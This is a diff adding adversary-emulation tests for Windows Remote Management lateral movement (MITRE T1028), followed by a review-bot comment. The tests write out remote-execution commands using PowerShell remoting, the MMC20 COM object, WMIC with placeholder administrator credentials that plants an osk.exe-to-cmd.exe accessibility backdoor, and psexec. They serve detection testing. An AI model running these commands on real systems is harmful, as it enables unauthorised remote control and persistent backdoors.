diff --git a/atomics/T1028/T1028.yaml b/atomics/T1028/T1028.yaml
new file mode 100644
index 00000000..883ae0d4
--- /dev/null
+++ b/atomics/T1028/T1028.yaml
@@ -0,0 +1,90 @@
+---
+attack_technique: T1028
+display_name: Windows Remote Management
+
+atomic_tests:
+- name: Enable Windows Remote Management
+ description: |
+ Powershell Enable WinRM
+
+ supported_platforms:
+ - windows
+
+ executor:
+ name: powershell
+ command: |
+ powershell Enable-PSRemoting -Force
+
+- name: PowerShell Lateral Movement
+ description: |
+ Powershell lateral movement using the mmc20 application com object
+
+ Reference:
+
+ https://blog.cobaltstrike.com/2017/01/24/scripting-matt-nelsons-mmc20-application-lateral-movement-technique/
+
+ supported_platforms:
+ - windows
+
+ input_arguments:
+ computername:
+ description: Name of Computer
+ type: string
+ default: computer1
+
+ executor:
+ name: command_prompt
+ command: |
+ powershell.exe [activator]::CreateInstance([type]::GetTypeFromProgID("MMC20.application","${computername}")).Documnet.ActiveView.ExecuteShellCommand("c:\windows\system32\calc.exe", $null, $null, "7")
+
+- name: WMIC Process Call Create
+ description: |
+ Utilize WMIC to start remote process
+
+ supported_platforms:
+ - windows
+
+ input_arguments:
+ user_name:
+ description: Username
+ type: String
+ default: DOMAIN\Administrator
+ password:
+ description: Password
+ type: String
+ default: P@ssw0rd1
+ computer_name:
+ description: Target Computer Name
+ type: String
+ default: Target
+
+ executor:
+ name: command_prompt
+ command: |
+ wmic /user:${user_name} /password:${password} /node:${computer_name} process call create "C:\Windows\system32\reg.exe add \"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\osk.exe\" /v \"Debugger\" /t REG_SZ /d \"cmd.exe\" /f"
+
+- name: Psexec
+ description: |
+ Utilize psexec to start remote process
+
+ supported_platforms:
+ - windows
+
+ input_arguments:
+ user_name:
+ description: Username
+ type: String
+ default: DOMAIN\Administrator
+ password:
+ description: Password
+ type: String
+ default: P@ssw0rd1
+ computer_name:
+ description: Target Computer 
Name
+ type: String
+ default: Target
+
+ executor:
+ name: command_prompt
+ command: |
+ psexec \\host -u domain\user -p password -s cmd.exe
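Review bot: The Psexec test declares `user_name`, `password` and `computer_name` as input_arguments but its command never references them, hardcoding `\\host -u domain\user -p password`; the command should be `psexec \\${computer_name} -u ${user_name} -p ${password} -s cmd.exe` so the arguments actually take effect, as the WMIC test already does. In the PowerShell Lateral Movement test, `.Documnet.ActiveView` misspells the MMC20 COM property `Document`, so that command will fail at runtime before executing anything. The WMIC test sets an Image File Execution Options debugger for `osk.exe` pointing at `cmd.exe` on the remote host, which leaves a persistent accessibility-feature backdoor behind after the test; the description should say so, and a cleanup step deleting that key (`reg.exe delete ... /f`) should be provided if the test schema supports one. The argument name `computername` in the second test is also inconsistent with the `computer_name` used by the other two.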